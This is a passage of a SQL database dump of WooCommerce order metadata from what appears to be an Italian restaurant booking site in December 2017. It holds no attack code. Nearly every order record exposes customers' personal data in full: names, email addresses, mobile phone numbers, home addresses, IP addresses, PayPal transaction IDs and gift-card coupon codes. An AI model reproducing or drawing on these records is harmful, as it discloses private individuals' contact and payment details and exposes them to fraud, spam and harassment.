Protaso'),(8281,563,'_billing_address_2',''),(8282,563,'_billing_city','Fiorenzuola'),(8283,563,'_billing_state',''),(8284,563,'_billing_postcode',''),(8285,563,'_billing_country',''),(8286,563,'_billing_email','veneziani.luigi@gmail.com'),(8287,563,'_billing_phone','3382277833'),(8288,563,'_shipping_first_name',''),(8289,563,'_shipping_last_name',''),(8290,563,'_shipping_company',''),(8291,563,'_shipping_address_1',''),(8292,563,'_shipping_address_2',''),(8293,563,'_shipping_city',''),(8294,563,'_shipping_state',''),(8295,563,'_shipping_postcode',''),(8296,563,'_shipping_country',''),(8297,563,'_order_currency','EUR'),(8298,563,'_cart_discount','0'),(8299,563,'_cart_discount_tax','0'),(8300,563,'_order_shipping','0'),(8301,563,'_order_shipping_tax','0'),(8302,563,'_order_tax','0'),(8303,563,'_order_total','60.00'),(8304,563,'_order_version','3.2.5'),(8305,563,'_prices_include_tax','no'),(8306,563,'_billing_address_index','luigi veneziani  San Protaso  Fiorenzuola    veneziani.luigi@gmail.com 3382277833'),(8307,563,'_shipping_address_index','        '),(8308,563,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8309,563,'Numero bambini fino a 6 anni','0'),(8310,563,'Numero ragazzi fino a 13 anni','0'),(8311,563,'Files attached','[]'),(8312,564,'_order_key','wc_order_5a382d9cc3256'),(8313,564,'_customer_user','0'),(8314,564,'_payment_method','paypal'),(8315,564,'_payment_method_title','PayPal'),(8316,564,'_transaction_id',''),(8317,564,'_customer_ip_address','79.32.8.130'),(8318,564,'_customer_user_agent','mozilla/5.0 (linux; android 4.4.2; gt-n7100 build/kot49h) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.84 mobile safari/537.36'),(8319,564,'_created_via','checkout'),(8320,564,'_date_completed',''),(8321,564,'_completed_date',''),(8322,564,'_date_paid',''),(8323,564,'_paid_date',''),(8324,564,'_cart_hash','7b6126373526c15218e6af306b33de17'),(8325,564,'_billing_first_name','luigi'),(8326,564,'_billing_last_name','veneziani'),(8327,564,'_billing_company',''),(8328,564,'_billing_address_1','San Protaso'),(8329,564,'_billing_address_2',''),(8330,564,'_billing_city','Fiorenzuola'),(8331,564,'_billing_state',''),(8332,564,'_billing_postcode',''),(8333,564,'_billing_country',''),(8334,564,'_billing_email','veneziani.luigi@gmail.com'),(8335,564,'_billing_phone','3382277833'),(8336,564,'_shipping_first_name',''),(8337,564,'_shipping_last_name',''),(8338,564,'_shipping_company',''),(8339,564,'_shipping_address_1',''),(8340,564,'_shipping_address_2',''),(8341,564,'_shipping_city',''),(8342,564,'_shipping_state',''),(8343,564,'_shipping_postcode',''),(8344,564,'_shipping_country',''),(8345,564,'_order_currency','EUR'),(8346,564,'_cart_discount','0'),(8347,564,'_cart_discount_tax','0'),(8348,564,'_order_shipping','0'),(8349,564,'_order_shipping_tax','0'),(8350,564,'_order_tax','0'),(8351,564,'_order_total','60.00'),(8352,564,'_order_version','3.2.5'),(8353,564,'_prices_include_tax','no'),(8354,564,'_billing_address_index','luigi veneziani  San Protaso  Fiorenzuola    veneziani.luigi@gmail.com 3382277833'),(8355,564,'_shipping_address_index','        '),(8356,564,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8357,564,'Numero bambini fino a 6 anni','0'),(8358,564,'Numero ragazzi fino a 13 anni','0'),(8359,564,'Files attached','[]'),(8360,565,'_order_key','wc_order_5a38ea5ccf4e1'),(8361,565,'_customer_user','0'),(8362,565,'_payment_method','paypal'),(8363,565,'_payment_method_title','PayPal'),(8364,565,'_transaction_id','6G882326DR441834B'),(8365,565,'_customer_ip_address','5.90.93.146'),(8366,565,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_1_2 like mac os x) applewebkit/604.3.5 (khtml, like gecko) version/11.0 mobile/15b202 safari/604.1'),(8367,565,'_created_via','checkout'),(8368,565,'_date_completed',''),(8369,565,'_completed_date',''),(8370,565,'_date_paid','1513679615'),(8371,565,'_paid_date','2017-12-19 11:33:35'),(8372,565,'_cart_hash','7b6126373526c15218e6af306b33de17'),(8373,565,'_billing_first_name','ALESSANDRO'),(8374,565,'_billing_last_name','GARLASSI'),(8375,565,'_billing_company',''),(8376,565,'_billing_address_1','Via Marco Praga 15'),(8377,565,'_billing_address_2',''),(8378,565,'_billing_city','Reggio Emilia'),(8379,565,'_billing_state',''),(8380,565,'_billing_postcode',''),(8381,565,'_billing_country',''),(8382,565,'_billing_email','agarlassi@gmail.com'),(8383,565,'_billing_phone','3474341527'),(8384,565,'_shipping_first_name',''),(8385,565,'_shipping_last_name',''),(8386,565,'_shipping_company',''),(8387,565,'_shipping_address_1',''),(8388,565,'_shipping_address_2',''),(8389,565,'_shipping_city',''),(8390,565,'_shipping_state',''),(8391,565,'_shipping_postcode',''),(8392,565,'_shipping_country',''),(8393,565,'_order_currency','EUR'),(8394,565,'_cart_discount','0'),(8395,565,'_cart_discount_tax','0'),(8396,565,'_order_shipping','0'),(8397,565,'_order_shipping_tax','0'),(8398,565,'_order_tax','0'),(8399,565,'_order_total','60.00'),(8400,565,'_order_version','3.2.5'),(8401,565,'_prices_include_tax','no'),(8402,565,'_billing_address_index','ALESSANDRO GARLASSI  Via Marco Praga 15  Reggio Emilia    agarlassi@gmail.com 3474341527'),(8403,565,'_shipping_address_index','        '),(8404,565,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8405,565,'Numero bambini fino a 6 anni','0'),(8406,565,'Numero ragazzi fino a 13 anni','0'),(8407,565,'Files attached','[]'),(8408,565,'Payer PayPal address','agarlassi@gmail.com'),(8409,565,'Payer first name','ALESSANDRO'),(8410,565,'Payer last name','GARLASSI'),(8411,565,'Payment type','instant'),(8412,565,'_paypal_status','completed'),(8413,565,'_download_permissions_granted','yes'),(8414,565,'_recorded_sales','yes'),(8415,565,'_recorded_coupon_usage_counts','yes'),(8416,565,'_order_stock_reduced','yes'),(8417,565,'PayPal Transaction Fee','2.39'),(8418,566,'_order_key','wc_order_5a391877a9380'),(8419,566,'_customer_user','0'),(8420,566,'_payment_method','paypal'),(8421,566,'_payment_method_title','PayPal'),(8422,566,'_transaction_id',''),(8423,566,'_customer_ip_address','83.147.112.132'),(8424,566,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_13_2) applewebkit/604.4.7 (khtml, like gecko) version/11.0.2 safari/604.4.7'),(8425,566,'_created_via','checkout'),(8426,566,'_date_completed',''),(8427,566,'_completed_date',''),(8428,566,'_date_paid',''),(8429,566,'_paid_date',''),(8430,566,'_cart_hash','3a3ad4f8dee210efd9bb321811d78fc8'),(8431,566,'_billing_first_name','alessandra'),(8432,566,'_billing_last_name','bamboli'),(8433,566,'_billing_company',''),(8434,566,'_billing_address_1',''),(8435,566,'_billing_address_2',''),(8436,566,'_billing_city',''),(8437,566,'_billing_state',''),(8438,566,'_billing_postcode',''),(8439,566,'_billing_country',''),(8440,566,'_billing_email','manzonadia@hotmail.com'),(8441,566,'_billing_phone','3347421647'),(8442,566,'_shipping_first_name',''),(8443,566,'_shipping_last_name',''),(8444,566,'_shipping_company',''),(8445,566,'_shipping_address_1',''),(8446,566,'_shipping_address_2',''),(8447,566,'_shipping_city',''),(8448,566,'_shipping_state',''),(8449,566,'_shipping_postcode',''),(8450,566,'_shipping_country',''),(8451,566,'_order_currency','EUR'),(8452,566,'_cart_discount','0'),(8453,566,'_cart_discount_tax','0'),(8454,566,'_order_shipping','0'),(8455,566,'_order_shipping_tax','0'),(8456,566,'_order_tax','0'),(8457,566,'_order_total','90.00'),(8458,566,'_order_version','3.2.5'),(8459,566,'_prices_include_tax','no'),(8460,566,'_billing_address_index','alessandra bamboli        manzonadia@hotmail.com 3347421647'),(8461,566,'_shipping_address_index','        '),(8462,566,'Indicare in caso di prenotazione tavolo. Quanti adulti?','3'),(8463,566,'Numero bambini fino a 6 anni','0'),(8464,566,'Numero ragazzi fino a 13 anni','0'),(8465,566,'Files attached','[]'),(8466,567,'_order_key','wc_order_5a391c52dbe4a'),(8467,567,'_customer_user','0'),(8468,567,'_payment_method','paypal'),(8469,567,'_payment_method_title','PayPal'),(8470,567,'_transaction_id','73K56241WM300615E'),(8471,567,'_customer_ip_address','5.170.111.65'),(8472,567,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10.13; rv:48.0) gecko/20100101 firefox/48.0'),(8473,567,'_created_via','checkout'),(8474,567,'_date_completed',''),(8475,567,'_completed_date',''),(8476,567,'_date_paid','1513692377'),(8477,567,'_paid_date','2017-12-19 15:06:17'),(8478,567,'_cart_hash','3a3ad4f8dee210efd9bb321811d78fc8'),(8479,567,'_billing_first_name','Alessandra'),(8480,567,'_billing_last_name','Bamboli'),(8481,567,'_billing_company',''),(8482,567,'_billing_address_1',''),(8483,567,'_billing_address_2',''),(8484,567,'_billing_city',''),(8485,567,'_billing_state',''),(8486,567,'_billing_postcode',''),(8487,567,'_billing_country',''),(8488,567,'_billing_email','manzonadia@hotmail.com'),(8489,567,'_billing_phone','3351661558'),(8490,567,'_shipping_first_name',''),(8491,567,'_shipping_last_name',''),(8492,567,'_shipping_company',''),(8493,567,'_shipping_address_1',''),(8494,567,'_shipping_address_2',''),(8495,567,'_shipping_city',''),(8496,567,'_shipping_state',''),(8497,567,'_shipping_postcode',''),(8498,567,'_shipping_country',''),(8499,567,'_order_currency','EUR'),(8500,567,'_cart_discount','0'),(8501,567,'_cart_discount_tax','0'),(8502,567,'_order_shipping','0'),(8503,567,'_order_shipping_tax','0'),(8504,567,'_order_tax','0'),(8505,567,'_order_total','90.00'),(8506,567,'_order_version','3.2.5'),(8507,567,'_prices_include_tax','no'),(8508,567,'_billing_address_index','Alessandra Bamboli        manzonadia@hotmail.com 3351661558'),(8509,567,'_shipping_address_index','        '),(8510,567,'Indicare in caso di prenotazione tavolo. Quanti adulti?','3'),(8511,567,'Numero bambini fino a 6 anni','0'),(8512,567,'Numero ragazzi fino a 13 anni','0'),(8513,567,'Files attached','[]'),(8514,567,'Payer PayPal address','manzonadia@hotmail.com'),(8515,567,'Payer first name','nadia'),(8516,567,'Payer last name','manzo'),(8517,567,'Payment type','instant'),(8518,567,'_paypal_status','completed'),(8519,567,'_download_permissions_granted','yes'),(8520,567,'_recorded_sales','yes'),(8521,567,'_recorded_coupon_usage_counts','yes'),(8522,567,'_order_stock_reduced','yes'),(8523,567,'PayPal Transaction Fee','3.41'),(8524,568,'_order_key','wc_order_5a392417831cf'),(8525,568,'_customer_user','0'),(8526,568,'_payment_method','paypal'),(8527,568,'_payment_method_title','PayPal'),(8528,568,'_transaction_id','2C725660FC8133029'),(8529,568,'_customer_ip_address','83.147.112.132'),(8530,568,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_13_2) applewebkit/604.4.7 (khtml, like gecko) version/11.0.2 safari/604.4.7'),(8531,568,'_created_via','checkout'),(8532,568,'_date_completed','1513718951'),(8533,568,'_completed_date','2017-12-19 22:29:11'),(8534,568,'_date_paid','1513694330'),(8535,568,'_paid_date','2017-12-19 15:38:50'),(8536,568,'_cart_hash','1d9ddb2a530f0b09f1e0fe99aec70955'),(8537,568,'_billing_first_name','Alessandra'),(8538,568,'_billing_last_name','Bamboli'),(8539,568,'_billing_company',''),(8540,568,'_billing_address_1',''),(8541,568,'_billing_address_2',''),(8542,568,'_billing_city',''),(8543,568,'_billing_state',''),(8544,568,'_billing_postcode',''),(8545,568,'_billing_country',''),(8546,568,'_billing_email','manzonadia@hotmail.com'),(8547,568,'_billing_phone','3351661558'),(8548,568,'_shipping_first_name',''),(8549,568,'_shipping_last_name',''),(8550,568,'_shipping_company',''),(8551,568,'_shipping_address_1',''),(8552,568,'_shipping_address_2',''),(8553,568,'_shipping_city',''),(8554,568,'_shipping_state',''),(8555,568,'_shipping_postcode',''),(8556,568,'_shipping_country',''),(8557,568,'_order_currency','EUR'),(8558,568,'_cart_discount','0'),(8559,568,'_cart_discount_tax','0'),(8560,568,'_order_shipping','0'),(8561,568,'_order_shipping_tax','0'),(8562,568,'_order_tax','0'),(8563,568,'_order_total','180.00'),(8564,568,'_order_version','3.2.6'),(8565,568,'_prices_include_tax','no'),(8566,568,'_billing_address_index','Alessandra Bamboli        manzonadia@hotmail.com 3351661558'),(8567,568,'_shipping_address_index','        '),(8568,568,'Indicare in caso di prenotazione tavolo. Quanti adulti?','6'),(8569,568,'Numero bambini fino a 6 anni','0'),(8570,568,'Numero ragazzi fino a 13 anni','0'),(8571,568,'Files attached','[]'),(8572,568,'Payer PayPal address','manzonadia@hotmail.com'),(8573,568,'Payer first name','Nadia'),(8574,568,'Payer last name','Manzo'),(8575,568,'Payment type','instant'),(8576,568,'_paypal_status','completed'),(8577,568,'_download_permissions_granted','yes'),(8578,568,'_recorded_sales','yes'),(8579,568,'_recorded_coupon_usage_counts','yes'),(8580,568,'_order_stock_reduced','yes'),(8581,568,'PayPal Transaction Fee','6.47'),(8582,569,'_order_currency','EUR'),(8583,569,'_cart_discount','0'),(8584,569,'_cart_discount_tax','0'),(8585,569,'_order_shipping','0'),(8586,569,'_order_shipping_tax','0'),(8587,569,'_order_tax','0'),(8588,569,'_order_total','-90.00'),(8589,569,'_order_version','3.2.5'),(8590,569,'_prices_include_tax','no'),(8591,569,'_refund_amount','90'),(8592,569,'_refunded_by','1'),(8593,569,'_refund_reason','Ordine completamente rimborsato'),(8594,570,'_order_key','wc_order_5a39372b44c02'),(8595,570,'_customer_user','0'),(8596,570,'_payment_method','paypal'),(8597,570,'_payment_method_title','PayPal'),(8598,570,'_transaction_id','9TN51257VB572340U'),(8599,570,'_customer_ip_address','185.45.71.7'),(8600,570,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; sm-g935f build/nrd90m) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.111 mobile safari/537.36'),(8601,570,'_created_via','checkout'),(8602,570,'_date_completed',''),(8603,570,'_completed_date',''),(8604,570,'_date_paid','1513699145'),(8605,570,'_paid_date','2017-12-19 16:59:05'),(8606,570,'_cart_hash','702d51f9e09d332b7f6a8c4393bbc373'),(8607,570,'_billing_first_name','Davide'),(8608,570,'_billing_last_name','Bacciocchi'),(8609,570,'_billing_company',''),(8610,570,'_billing_address_1','Via Ugo Bassi, 25'),(8611,570,'_billing_address_2',''),(8612,570,'_billing_city','San Marino'),(8613,570,'_billing_state',''),(8614,570,'_billing_postcode',''),(8615,570,'_billing_country',''),(8616,570,'_billing_email','davibacio@gmail.com'),(8617,570,'_billing_phone','3393281726'),(8618,570,'_shipping_first_name',''),(8619,570,'_shipping_last_name',''),(8620,570,'_shipping_company',''),(8621,570,'_shipping_address_1',''),(8622,570,'_shipping_address_2',''),(8623,570,'_shipping_city',''),(8624,570,'_shipping_state',''),(8625,570,'_shipping_postcode',''),(8626,570,'_shipping_country',''),(8627,570,'_order_currency','EUR'),(8628,570,'_cart_discount','0'),(8629,570,'_cart_discount_tax','0'),(8630,570,'_order_shipping','0'),(8631,570,'_order_shipping_tax','0'),(8632,570,'_order_tax','0'),(8633,570,'_order_total','98.00'),(8634,570,'_order_version','3.2.5'),(8635,570,'_prices_include_tax','no'),(8636,570,'_billing_address_index','Davide Bacciocchi  Via Ugo Bassi, 25  San Marino    davibacio@gmail.com 3393281726'),(8637,570,'_shipping_address_index','        '),(8638,570,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8639,570,'Numero bambini fino a 6 anni','0'),(8640,570,'Numero ragazzi fino a 13 anni','0'),(8641,570,'Files attached','[]'),(8642,570,'Payer PayPal address','davibacio@gmail.com'),(8643,570,'Payer first name','Davide'),(8644,570,'Payer last name','Bacciocchi'),(8645,570,'Payment type','instant'),(8646,570,'_paypal_status','completed'),(8647,570,'_download_permissions_granted','yes'),(8648,570,'_recorded_sales','yes'),(8649,570,'_recorded_coupon_usage_counts','yes'),(8650,571,'discount_type','fixed_cart'),(8651,571,'coupon_amount','98'),(8652,571,'individual_use','no'),(8653,571,'usage_limit','1'),(8654,571,'expiry_date','2018-06-17'),(8655,571,'apply_before_tax','no'),(8656,571,'free_shipping','no'),(8657,571,'minimum_amount',''),(8658,571,'maximum_amount',''),(8659,571,'exclude_sale_items','no'),(8660,571,'exclude_product_ids',''),(8661,571,'exclude_product_categories',''),(8662,571,'mwb_wgm_giftcard_coupon','570'),(8663,571,'mwb_wgm_giftcard_coupon_unique','online'),(8664,571,'mwb_wgm_giftcard_coupon_product_id','435'),(8665,571,'mwb_wgm_giftcard_coupon_mail_to','davibacio@gmail.com'),(8666,570,'570#141','solymarcouponH86XO'),(8667,570,'mwb_wgm_order_giftcard','send'),(8668,570,'_order_stock_reduced','yes'),(8669,570,'PayPal Transaction Fee','3.68'),(8670,572,'_order_key','wc_order_5a3949dda3e08'),(8671,572,'_customer_user','0'),(8672,572,'_payment_method','paypal'),(8673,572,'_payment_method_title','PayPal'),(8674,572,'_transaction_id',''),(8675,572,'_customer_ip_address','151.57.133.85'),(8676,572,'_customer_user_agent','mozilla/5.0 (compatible; msie 9.0; windows nt 6.0; trident/5.0)'),(8677,572,'_created_via','checkout'),(8678,572,'_date_completed',''),(8679,572,'_completed_date',''),(8680,572,'_date_paid',''),(8681,572,'_paid_date',''),(8682,572,'_cart_hash','7b6126373526c15218e6af306b33de17'),(8683,572,'_billing_first_name','barbara'),(8684,572,'_billing_last_name','carretta'),(8685,572,'_billing_company',''),(8686,572,'_billing_address_1','viottolo dei bacchi 32/a'),(8687,572,'_billing_address_2',''),(8688,572,'_billing_city','brescello'),(8689,572,'_billing_state',''),(8690,572,'_billing_postcode',''),(8691,572,'_billing_country',''),(8692,572,'_billing_email','edensportj.ba@gmail.com'),(8693,572,'_billing_phone','3497760828'),(8694,572,'_shipping_first_name',''),(8695,572,'_shipping_last_name',''),(8696,572,'_shipping_company',''),(8697,572,'_shipping_address_1',''),(8698,572,'_shipping_address_2',''),(8699,572,'_shipping_city',''),(8700,572,'_shipping_state',''),(8701,572,'_shipping_postcode',''),(8702,572,'_shipping_country',''),(8703,572,'_order_currency','EUR'),(8704,572,'_cart_discount','0'),(8705,572,'_cart_discount_tax','0'),(8706,572,'_order_shipping','0'),(8707,572,'_order_shipping_tax','0'),(8708,572,'_order_tax','0'),(8709,572,'_order_total','60.00'),(8710,572,'_order_version','3.2.5'),(8711,572,'_prices_include_tax','no'),(8712,572,'_billing_address_index','barbara carretta  viottolo dei bacchi 32/a  brescello    edensportj.ba@gmail.com 3497760828'),(8713,572,'_shipping_address_index','        '),(8714,572,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8715,572,'Numero bambini fino a 6 anni','0'),(8716,572,'Numero ragazzi fino a 13 anni','0'),(8717,572,'Files attached','[]'),(8718,573,'_order_key','wc_order_5a3981c2acae4'),(8719,573,'_customer_user','0'),(8720,573,'_payment_method','paypal'),(8721,573,'_payment_method_title','PayPal'),(8722,573,'_transaction_id','7KV4528724607860F'),(8723,573,'_customer_ip_address','79.32.8.130'),(8724,573,'_customer_user_agent','mozilla/5.0 (linux; android 4.4.2; gt-n7100 build/kot49h) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.84 mobile safari/537.36'),(8725,573,'_created_via','checkout'),(8726,573,'_date_completed',''),(8727,573,'_completed_date',''),(8728,573,'_date_paid','1513718607'),(8729,573,'_paid_date','2017-12-19 22:23:27'),(8730,573,'_cart_hash','7b6126373526c15218e6af306b33de17'),(8731,573,'_billing_first_name','luigi'),(8732,573,'_billing_last_name','veneziani'),(8733,573,'_billing_company',''),(8734,573,'_billing_address_1','San Protaso'),(8735,573,'_billing_address_2',''),(8736,573,'_billing_city','Fiorenzuola'),(8737,573,'_billing_state',''),(8738,573,'_billing_postcode',''),(8739,573,'_billing_country',''),(8740,573,'_billing_email','veneziani.luigi@gmail.com'),(8741,573,'_billing_phone','3382277833'),(8742,573,'_shipping_first_name',''),(8743,573,'_shipping_last_name',''),(8744,573,'_shipping_company',''),(8745,573,'_shipping_address_1',''),(8746,573,'_shipping_address_2',''),(8747,573,'_shipping_city',''),(8748,573,'_shipping_state',''),(8749,573,'_shipping_postcode',''),(8750,573,'_shipping_country',''),(8751,573,'_order_currency','EUR'),(8752,573,'_cart_discount','0'),(8753,573,'_cart_discount_tax','0'),(8754,573,'_order_shipping','0'),(8755,573,'_order_shipping_tax','0'),(8756,573,'_order_tax','0'),(8757,573,'_order_total','60.00'),(8758,573,'_order_version','3.2.6'),(8759,573,'_prices_include_tax','no'),(8760,573,'_billing_address_index','luigi veneziani  San Protaso  Fiorenzuola    veneziani.luigi@gmail.com 3382277833'),(8761,573,'_shipping_address_index','        '),(8762,573,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8763,573,'Numero bambini fino a 6 anni','0'),(8764,573,'Numero ragazzi fino a 13 anni','0'),(8765,573,'Files attached','[]'),(8766,573,'Payer PayPal address','veneziani.luigi@gmail.com'),(8767,573,'Payer first name','LUIGI'),(8768,573,'Payer last name','VENEZIANI'),(8769,573,'Payment type','instant'),(8770,573,'_paypal_status','completed'),(8771,573,'_download_permissions_granted','yes'),(8772,573,'_recorded_sales','yes'),(8773,573,'_recorded_coupon_usage_counts','yes'),(8774,573,'_order_stock_reduced','yes'),(8775,573,'PayPal Transaction Fee','2.39'),(8776,568,'_edit_lock','1513719095:1'),(8777,575,'_order_key','wc_order_5a3a9a1da9b61'),(8778,575,'_customer_user','16'),(8779,575,'_payment_method','paypal'),(8780,575,'_payment_method_title','PayPal'),(8781,575,'_transaction_id','6H920780EJ619414G'),(8782,575,'_customer_ip_address','159.20.207.242'),(8783,575,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.89 safari/537.36 opr/49.0.2725.47'),(8784,575,'_created_via','checkout'),(8785,575,'_date_completed',''),(8786,575,'_completed_date',''),(8787,575,'_date_paid','1513790028'),(8788,575,'_paid_date','2017-12-20 18:13:48'),(8789,575,'_cart_hash','651e0c6820a5a7b5617423c8c4d7de56'),(8790,575,'_billing_first_name','stefano'),(8791,575,'_billing_last_name','agnoletti'),(8792,575,'_billing_company',''),(8793,575,'_billing_address_1','case urbini 1 52026 AR'),(8794,575,'_billing_address_2',''),(8795,575,'_billing_city','castelfranco piandiscò'),(8796,575,'_billing_state',''),(8797,575,'_billing_postcode',''),(8798,575,'_billing_country',''),(8799,575,'_billing_email','stefano.agnoletti@virgilio.it'),(8800,575,'_billing_phone','3478901159'),(8801,575,'_shipping_first_name',''),(8802,575,'_shipping_last_name',''),(8803,575,'_shipping_company',''),(8804,575,'_shipping_address_1',''),(8805,575,'_shipping_address_2',''),(8806,575,'_shipping_city',''),(8807,575,'_shipping_state',''),(8808,575,'_shipping_postcode',''),(8809,575,'_shipping_country',''),(8810,575,'_order_currency','EUR'),(8811,575,'_cart_discount','0'),(8812,575,'_cart_discount_tax','0'),(8813,575,'_order_shipping','0.00'),(8814,575,'_order_shipping_tax','0'),(8815,575,'_order_tax','0'),(8816,575,'_order_total','60.00'),(8817,575,'_order_version','3.2.6'),(8818,575,'_prices_include_tax','no'),(8819,575,'_billing_address_index','stefano agnoletti  case urbini 1 52026 AR  castelfranco piandiscò    stefano.agnoletti@virgilio.it 3478901159'),(8820,575,'_shipping_address_index','        '),(8821,575,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8822,575,'Numero bambini fino a 6 anni','0'),(8823,575,'Numero ragazzi fino a 13 anni','0'),(8824,575,'Files attached','[]'),(8825,575,'Payer PayPal address','stefano.agnoletti@virgilio.it'),(8826,575,'Payer first name','stefano'),(8827,575,'Payer last name','agnoletti'),(8828,575,'Payment type','instant'),(8829,575,'_paypal_status','completed'),(8830,575,'_download_permissions_granted','yes'),(8831,575,'_recorded_sales','yes'),(8832,575,'_recorded_coupon_usage_counts','yes'),(8833,575,'_order_stock_reduced','yes'),(8834,575,'PayPal Transaction Fee','2.39'),(8835,576,'_order_key','wc_order_5a3b9798b3618'),(8836,576,'_customer_user','0'),(8837,576,'_payment_method','paypal'),(8838,576,'_payment_method_title','PayPal'),(8839,576,'_transaction_id','3GM12611T9623550R'),(8840,576,'_customer_ip_address','151.9.83.66'),(8841,576,'_customer_user_agent','mozilla/5.0 (windows nt 5.1; rv:52.0) gecko/20100101 firefox/52.0'),(8842,576,'_created_via','checkout'),(8843,576,'_date_completed','1513855034'),(8844,576,'_completed_date','2017-12-21 12:17:14'),(8845,576,'_date_paid','1513855029'),(8846,576,'_paid_date','2017-12-21 12:17:09'),(8847,576,'_cart_hash','703254cb561e2fbe9e8177f5d439396f'),(8848,576,'_billing_first_name','luca'),(8849,576,'_billing_last_name','antonelli'),(8850,576,'_billing_company',''),(8851,576,'_billing_address_1','via provinciale, 5'),(8852,576,'_billing_address_2',''),(8853,576,'_billing_city','40035 castiglione dei pepoli (BO)'),(8854,576,'_billing_state',''),(8855,576,'_billing_postcode',''),(8856,576,'_billing_country',''),(8857,576,'_billing_email','luca_anto1976@libero.it'),(8858,576,'_billing_phone','3289292507'),(8859,576,'_shipping_first_name',''),(8860,576,'_shipping_last_name',''),(8861,576,'_shipping_company',''),(8862,576,'_shipping_address_1',''),(8863,576,'_shipping_address_2',''),(8864,576,'_shipping_city',''),(8865,576,'_shipping_state',''),(8866,576,'_shipping_postcode',''),(8867,576,'_shipping_country',''),(8868,576,'_order_currency','EUR'),(8869,576,'_cart_discount','0'),(8870,576,'_cart_discount_tax','0'),(8871,576,'_order_shipping','0.00'),(8872,576,'_order_shipping_tax','0'),(8873,576,'_order_tax','0'),(8874,576,'_order_total','98.00'),(8875,576,'_order_version','3.2.6'),(8876,576,'_prices_include_tax','no'),(8877,576,'_billing_address_index','luca antonelli  via provinciale, 5  40035 castiglione dei pepoli (BO)    luca_anto1976@libero.it 3289292507'),(8878,576,'_shipping_address_index','        '),(8879,576,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8880,576,'Numero bambini fino a 6 anni','0'),(8881,576,'Numero ragazzi fino a 13 anni','0'),(8882,576,'Files attached','[]'),(8883,576,'Payer PayPal address','luca_anto1976@libero.it'),(8884,576,'Payer first name','claudio'),(8885,576,'Payer last name','antonelli'),(8886,576,'Payment type','instant'),(8887,576,'_paypal_status','completed'),(8888,576,'_download_permissions_granted','yes'),(8889,576,'_recorded_sales','yes'),(8890,576,'_recorded_coupon_usage_counts','yes'),(8891,577,'discount_type','fixed_cart'),(8892,577,'coupon_amount','98'),(8893,577,'individual_use','no'),(8894,577,'usage_limit','1'),(8895,577,'expiry_date','2018-06-19'),(8896,577,'apply_before_tax','no'),(8897,577,'free_shipping','no'),(8898,577,'minimum_amount',''),(8899,577,'maximum_amount',''),(8900,577,'exclude_sale_items','no'),(8901,577,'exclude_product_ids',''),(8902,577,'exclude_product_categories',''),(8903,577,'mwb_wgm_giftcard_coupon','576'),(8904,577,'mwb_wgm_giftcard_coupon_unique','online'),(8905,577,'mwb_wgm_giftcard_coupon_product_id','435'),(8906,577,'mwb_wgm_giftcard_coupon_mail_to','Angelo e Lara'),(8907,576,'576#145','solymarcoupon575HT'),(8908,576,'mwb_wgm_order_giftcard','send'),(8909,576,'_order_stock_reduced','yes'),(8910,576,'PayPal Transaction Fee','3.68'),(8911,578,'_order_currency','EUR'),(8912,578,'_cart_discount','0'),(8913,578,'_cart_discount_tax','0'),(8914,578,'_order_shipping','0'),(8915,578,'_order_shipping_tax','0'),(8916,578,'_order_tax','0'),(8917,578,'_order_total','-120.00'),(8918,578,'_order_version','3.2.6'),(8919,578,'_prices_include_tax','no'),(8920,578,'_refund_amount','120'),(8921,578,'_refunded_by','1'),(8922,578,'_refund_reason','Ordine completamente rimborsato'),(8923,579,'_order_key','wc_order_5a3e9b5fad315'),(8924,579,'_customer_user','17'),(8925,579,'_payment_method','paypal'),(8926,579,'_payment_method_title','PayPal'),(8927,579,'_transaction_id','25615521NB120923D'),(8928,579,'_customer_ip_address','93.44.98.79'),(8929,579,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_1 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c153 safari/604.1'),(8930,579,'_created_via','checkout'),(8931,579,'_date_completed',''),(8932,579,'_completed_date',''),(8933,579,'_date_paid','1514052491'),(8934,579,'_paid_date','2017-12-23 19:08:11'),(8935,579,'_cart_hash','c8ac0c8bc4f02431afa5b11d95091f41'),(8936,579,'_billing_first_name','Marco'),(8937,579,'_billing_last_name','Castellani'),(8938,579,'_billing_company',''),(8939,579,'_billing_address_1','Viale Viterbo 6'),(8940,579,'_billing_address_2',''),(8941,579,'_billing_city','Riccione'),(8942,579,'_billing_state',''),(8943,579,'_billing_postcode',''),(8944,579,'_billing_country',''),(8945,579,'_billing_email','Marcocastellani000@gmail.com'),(8946,579,'_billing_phone','3482515476'),(8947,579,'_shipping_first_name',''),(8948,579,'_shipping_last_name',''),(8949,579,'_shipping_company',''),(8950,579,'_shipping_address_1',''),(8951,579,'_shipping_address_2',''),(8952,579,'_shipping_city',''),(8953,579,'_shipping_state',''),(8954,579,'_shipping_postcode',''),(8955,579,'_shipping_country',''),(8956,579,'_order_currency','EUR'),(8957,579,'_cart_discount','0'),(8958,579,'_cart_discount_tax','0'),(8959,579,'_order_shipping','0.00'),(8960,579,'_order_shipping_tax','0'),(8961,579,'_order_tax','0'),(8962,579,'_order_total','180.00'),(8963,579,'_order_version','3.2.6'),(8964,579,'_prices_include_tax','no'),(8965,579,'_billing_address_index','Marco Castellani  Viale Viterbo 6  Riccione    Marcocastellani000@gmail.com 3482515476'),(8966,579,'_shipping_address_index','        '),(8967,579,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(8968,579,'Numero bambini fino a 6 anni','0'),(8969,579,'Numero ragazzi fino a 13 anni','2'),(8970,579,'Files 